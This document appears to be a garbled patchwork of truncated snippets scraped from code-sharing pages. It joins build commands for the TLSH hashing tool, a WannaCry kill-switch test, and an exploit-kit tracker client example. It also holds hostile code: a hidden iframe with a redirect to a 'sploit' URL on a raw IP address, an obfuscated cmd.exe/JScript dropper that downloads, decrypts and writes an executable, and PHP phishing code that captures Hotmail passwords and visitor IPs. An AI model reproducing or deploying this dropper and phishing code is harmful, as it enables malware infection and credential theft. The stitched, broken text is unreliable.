sudo apt-get install cmake
curl -L -O https://github.com/trendmicro/tlsh/archive/v3.4.5.zip
unzip v3.4.5.zip
cd tlsh-3.4.5/
bash make.sh
<HEAD> | |
</HEAD> | |
<BODY BGCOLOR="WHITE"> | |
<CENTER> | |
<iframe width="0" scrolling="no" height="0" frameborder="0" src="" seamless="seamless"> | |
<H1>A Simple Sample Web Page</H1> | |
If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html |
$("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php" |
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText |
/* | |
A simple test to check the behavior of WannaCry's Kill Switch | |
functionality. Compile with Visual Studio. | |
@brad_anton | |
Example Run: | |
Set DNS to 208.67.222.222 | |
C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe | |
GOOD: WannaCry would have been aborted! |
GET / HTTP/1.1 | |
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | |
Cache-Control: no-cache |
import httplib2 | |
import os | |
import base64 | |
import email | |
import re | |
from apiclient import errors | |
from apiclient import discovery | |
from oauth2client import client | |
from oauth2client import tools |
<?php | |
$ip = getenv("REMOTE_ADDR"); | |
//Get IP Country City | |
$url = "http://api.ipinfodb.com/v3/ip-country/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip"; | |
$url = "http://api.ipinfodb.com/v3/ip-city/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip"; | |
$ipCountryCityInfo = file_get_contents($url); | |
// |
An example client library can be found in client.py
. To use:
>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key')
>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}
<?php | |
session_start(); | |
$country = visitor_country(); | |
$ip = $_SERVER['REMOTE_ADDR']; | |
$login = $_SESSION['clientemail']; | |
$passwd = $_POST['passwd']; | |
$sender = 'Hotmail-3D@serverX.com'; | |
$over = 'https://outlook.live.com/owa/?path=/mail/inbox'; |